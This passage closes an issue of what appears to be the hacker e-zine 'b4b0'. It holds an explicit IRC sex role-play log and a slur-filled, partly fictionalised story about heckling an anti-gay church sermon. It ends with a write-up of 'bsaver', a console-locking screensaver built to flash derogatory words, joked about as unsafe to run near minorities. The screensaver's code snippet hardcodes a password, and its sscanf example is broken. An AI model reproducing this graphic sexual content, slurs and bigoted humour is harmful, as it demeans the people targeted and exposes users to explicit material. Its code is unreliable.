gave you irc head um not really it lasted like what 15 seconds/ irc head is technically at least 4 minutes long last i checked irc head rfc HEH um, actually i did :\ just start over and do it again, god damnit. heh this is great. i can't help it if i can't be that descriptive well do it again. i dunno what to say try harder. just imagine what u'd do irl ! then describe it er heh. sigh fine word more irc head. th1z iz to elite. ð sek starts to play with your dick with her fingers, rubbing your head a little h3h. ð sek puts your whole dick in her mouth, and sucks softly ð sek moves up, and starts to suck on just your head ð sek runs her tongue over your dick, flicking it softly damn ð sek deepthroats again, and sucks hard and she s4id she didn't know how HEHh boy u like deepthroating alright. h4hahj th1z is elite ð sek shrugs guys seem to like it and i'm good at it k. onward. also, if a guy cums in my mouth and i'm deepthroating, i don't taste it :P k. onward. l4nd h03. ð sek sucks a little harder, and rotates her head a little ð sek puts some poprocks in her mouth, and sucks a little more hEH wtf dat would burn no suq a little harder be0tch it doesn't jea well onward ho! kinda like ice t1ngly heh continue! btw what size cup do u wear hEH. 36D why? 36d? wow EH did gr1p give you new.jpg? :\ no. ok. haven't seen him in a few dayz now continue ð sek starts to move her head a bit faster, and suck a bit harder this is where i grab da back of ur head hEH ds just came up here ds/? datashark so continue! hEH er fine ð sek tongues your dick as she sucks d4mn skippy. ð sek moves even faster, sucking harder jea b1tch t3ll m3 h0w u luv it wh3n i gr4b ur h4ir and force u d33per HEH er TELL m3 h3h ð sek is deepthroating already :P ð sek can't go any deeper END - comp4ct = elite - END ---------------------------------------------------------------[revolution] How I literally got kicked out of the Eastern Baptist Church by schemerz Disclaimer : Incidents included are all fictionious in nature due to the shady recollection process after smoking a little bit too much hash. Gewf was pressing for shtuff and I had to give him something, and these incidents were funny, at least as I rem ember it. These accounts are somewhat factual, somewhat not, so I decided just to change the names and make it safe in case I get anything horribly wrong. Eastern Baptist Church is located in Topuka, the capital of the state Kansas. It's not a really big church, but they get in the news alot. Most of the time they leave their tact at home and picket funerals and concerts, most recently the funeral of Math ew Sheppard. (I think they are too chicken to picket the rob zomebie and korn concert in KC last night, kick ass concert btw, but that's another article... :) They are also responsible for web sites such as www.goddetestsfags.com. So they are really a fun bunch. Rush Limbough would have been proud. Reverend Fred Felps heads the crowd, who was a lawyer in a previous life, until one of his sons got out of the closet. Fred Felps then runs to the nearest Warmart to purchase a really bad white robe and calls himself a preacher. After being thrown out o f the Southern Baptist Church because of his faggot hating ways, he started his own church, the Eastern Baptist Church, which basically runs out of his own house along with 20-30 family members and close friends. They get supported by a lot of white powe r parties too. Although not all of the family is predominantly prejudgice, I have had the pleasure of meeting his grandson, Ben Felps, who happens to be a graduate student doing computer science at University of Kansas. Ben admins most of his granddaddy 's sites, including of course yours truly. Enough with the background. I have to explain why I had the urge of seeing one of these sermons of Fred, if not fucking it up and causing some serious mayhem: Almost 3 years ago I arrived in Kansas fresh off the boat, as they would say afer having a less than stellar high school career somewhere in South East Asia. Shortly after arriving into the university and being shipped off to this smelly little dorm room , I was introduced to Sam my new roomate. He drove me around, showing me stuff and I got to know him very well. We were just kicking it one weekend in september and started watching the tele, when channel 6 was doing a special of a concert held at a loc al community college. Turns out this composer was dying of AIDS, and someone was holding a concert in his name for being the talent as he is. (I can't remember this dood's name, but I remember listening to some of his stuff on the local university radio now. Truly a talent.) Caught out of the corner of the camera there were these doods holding up signs with slogans like "Anal Sex=Aids=Death", "Gay=Death of Ethics=Death of America" and of course, "God detests fags!". I was thoroughly bewildered at the sight of such signs, and proceeded to bug Sam about it. Shit like this at home just does not fly. It's not like asians have a strong tolerance of homosexuals or racial diversity, but they keep it to themselves and have the politeness to withhold their opinion at times of mourning, such as a concert displaying ones work as one dies of aids. Being the fuckwit 18 year old that I was, I suggested to Sam that we would head over and see one of their sermons and check out their reasoning, because neither of us can make any logical sense out of Fred's websites. So we called the church up, asked if it was an open sermon coming up. We stated that we weren't gonna cause trouble, and putting on my fakeist british accent, asked if we could attend. We were of co urse declined the opportunity, since it was a close church. Being the dumb motherfucker sam can be sometimes, we decided to crash the party instead. (He's getting married to the least sensible woman on this planet in a month, so WATCH OUT FOR DA KIDS) So we hoped into his girlfriends car (btw we chatted this woman up no more than one week before, and now three years latter sam is fucking marrying the woman... good god... time has past QUICKLY... oh and she lent him the car... Megan is so fucking co ol, prolly cause Sam is such a fucking pimp), and drove to Topuka. We arrived at the church shortly before the sermon begun, and walked in, saying we are looking for Ben. Ben came out shortly, trying to cover his blood soaked ass, saying that his grandd ad was holding a sermon. We talked abit, commenting a little about the upside down american flag hanging outside the church. He said he would attend to us shortly after the sermon. I put on the largest puppy dog eyes I could muster, and asked *very* po litely if I can attend the sermon. Since he was a ta in one of my computer science lab classes, he was sure I wasn't going to pull any shit. We got in, sat on a seat. The living room was packed, and Sam was kinda chickening out a little... "Maybe we shon't be here dood..." Little did I know he was one of the most articulate argurers I was ever gonna meet :) So the sermon went, the usual ch urch shit, yahdayahdayahda... the hymes, the prayers and all that... until about 45 minutes latter Sam woke me from deep slumber when Fred started preaching the evils of homosexuality. People started asking questions as he spoke, and he answered quite logically. The man was a lawyer I thought, most of them, like my dad, have a knack of conveying one side of reasoning and made it all encompassing. So I held up my hand, to which I was asked to speak. "Reverend Felps, I am new here, in this church and in this country. I don't quite understand why you seem to direct all your problems at one social group who a) pay more taxes per capita then most other minorites, b) are probably more educated as well ? How can any group contributing to the government and society in such a way be considered harmful ?" He muttered something ridiculous like telling me to get a haircut, which was when Sam (he's got hair down to his ass... I learned never ever to talk any shit about long hair around him) stood up and started his rhetoric :)... "Mr Felps, I would like to know why you are so proliferic about your projections on to gay people. It is quite entertaining, humorous even, that you would chose to broadcast your inner id feelings towards homosexuals on national television. " Most people got the joke, and gave us the evilest look they could muster. I must say most people would have backdowned and shut up at this point, but Sam, oh Sam... what can I say... Anyways, Mr Felps professed that he did not know what Sam meant. Sam : "Mr Felps, would you like to answer my friends question as to why you are targeting one of the more successful groups of minorites of this country ?" Felps : "I happen to think their lifestyle is a harmful influence to our youth in this country. I also happen to percieve that this country is being overran by faggots. Is there no more decency in this country ?" (applause by his crowd) "Mr Felps, as I recall correctly, the american society is firmly capitalist, meaning that each individual's success is based upon one's wealth. how would the lifestyle of a homosexual, one of success, good education and wealth be questionable to the yout h? " Felps : "As *I* recall correctly, the american society is firmly CHRISTIAN based. It is because of non-believers such as these homosexuals, that the youth today stem from the faith. That, is why I am opposed to them." Me : "But was it not in the new Testament itself that states that we should love our neighbours ?" Felps : "Ummmmm... Are you familiar with the book of Sodom ?" Sam : "Yes I am, and I am familiar with this line of arguement. You would state that the book of sodom states quite clearly that male-male sexual activites are forbidden and the only male-female copulation is deemed allowable by god. You would also stat e that the bible FIRMLY states that sex is a sacred act of god, and people should not abuse this power. You will also lead into the argument right here that AIDS and other sexually transmitted diseases was the repricusion of these acts." Felps : "You read my mind son. How would you chose to refute these claims. I am of course a man binded by faith, so please keep any arguements of the bible's validity to yourself. " Sam : "Okay... Homosexuality has been documented long since roman times. How come aids were to come around now?" Felps : "There are other sexual transmitted diseases that god has dispensed in his fury upon this planet. Unfortunately the devil has made the faggot strong in his ways, and they have not been disuaded." Me : "How about this ? It is nearly medically impossible for lesbians to contract aids. If god indeed try to make AIDS as a means of disuading homosexuality, why are a) more hetrosexuals affected ? b) why did he leave half the faggots off the list ? " Felps : "God is not fair, he chose to punish the whole of humanity for the crimes of the faggots. I have taken up the task of god to disuade all of humanity against the ways of faggots. Lesbians are evil too." One of us : "You still have not answered the questions we posed, could you please answer them now ? " Felps : "I have answered them son. God has other diseases to weaken his enemy. Aids is only one piece in his arsenal. Gonoerrha, syphillis, etc etc all attack sexually indecent men and women in some way or another." One of us : "Alright fair enough, how about this... If a person who is not sexually promiscous, then it is very unlikely that he or she gets infected with anything correct ? Is it possible that your god wants to disuade his people away from promiscious sex ? Has he not made a distinction between acts of love and acts of passion before ?" Felps :"God has made it very clear that sexual acts outside of wedlock are forbidden. " Me :"Mr Felps, where does it exactly in the bible say that wedlock has to between a man and a woman ?" Felps : (stammers some unintelligible... me and sam exchange evil grinning looks...) Me : "As a matter of fact, where in the bible does it define the man and the woman entity, biologically and psychologically ? If this premise is not made, then all your arguements against homosexuality is up to question." Someone in the crowd : "How is that ?" Sam : "Well it is quite easy to see that a gay couple can be enacting both the male and female parts of the relationship. With legislation allowing homosexuals to marry in Hawaii it is perfectly ethical for gays to be in bounds of christianity and still copulate. No ?" Someone in the crowd : (something like you fags or faggot loving liberals... something dumb like that... think it was Ben. ) Someone else in the crowd : (Leave if you don't like what we have to say, We don't like you anyways.) Sam : "We are merely discussing the rhetoric in the bible, I personally made no attacks towards the validity of the good book, neither did my friend here. " Some bitch in the crowd : "Shut up you people are full of it as it is!" Me : "We were merely discussing with the *beloved* reverend the various interpreations of the bible over a fine comb." We were asked to leave anyways :) In fact, we didn't leave quite yet until Sam got his answers from his questions. Sorely to say we were rather discouraged with our journey towards the interpretations of the bible. I personally ditched the cross and became a taoist instead. Oh well... Fred was beaten up in the middle of Kansas City one day when he was picketing somewhere near the Plaza. HEH it was a sight to behold. He's wrong. I am right. HAHA -!- -!- -!- -!- -!- -!- -!- bsaver overview -!- -!- -!- -!- -!- -!- -!- -!- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- -i- This little program, based off of Qytpos drugz2.c, has been turned into a lovely ncurses screen saver. Nice words, derogatory words, and most importantly; dill monkey words come up -- It's fun for the whole family. We / I decided to just store the password in this line here. static char passwd[] = "dillmonkey" ; if you can code just a teeny bit, you can change this to a macro. did i mention teeny? We also thought that perhaps you might want to accept a password via something prompting for a password at each session. Such might be accomplished by: static char passwd[20]; ... printf("Enter password to use: "); sscanf("%20s", passwd); but the problem is, if you forget, you might as well reboot. Also, you can have it saved in perhaps a file .bsaver and open, fgets() from it, but remember the character length has to be 20! You can also merely use the passwd structure and use your login password via crypt() etc. Anyways, the code is yours to edit. If there is any problems, mail me at comp4ct@hotmail.com p.s. don't abuse getch. Hit Enter *ONE TIME* to get a password prompt. NOTE: If you have any minorities in your office / household, i would not run this program infront of them. It make lock your console, but if they see whats popping up, you could be fired / flogged. But isn't that the b4b0 way? Good Day, cp4kt Special thanks to: Matt Conover (Shok of w00w00) for his great article on console ioctls. The macros used to lock console were taken from there. Thank you. -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- -/- Closing up.. WELP, THATS IT. Hope you enjoyed this totally k-sp1ff, extroidinarily diverse issue of BABO! Please send many submissions to us for b4b0 8. submissions@b4b0.org | Comments and questions go to letters@b4b0.org Your editor, ph1x. ######## ######## ######## ## ## ## ## ######## ## ## ######## ## ## ## ## ######## ######## ## * IN THE NEXT EXCITING EPISODE OF B4B0, SAT AND ACT ANSWERS WILL BE GIVEN! * NOT TO MENTION OUR COPY OF ALIEN AUTOPSY PORNAGRAPHY STARRING JONATHAN * FRAKES WILL BE UUENCODED AND DISTRIBUTED. UNTIL THEN, STAY TUNED!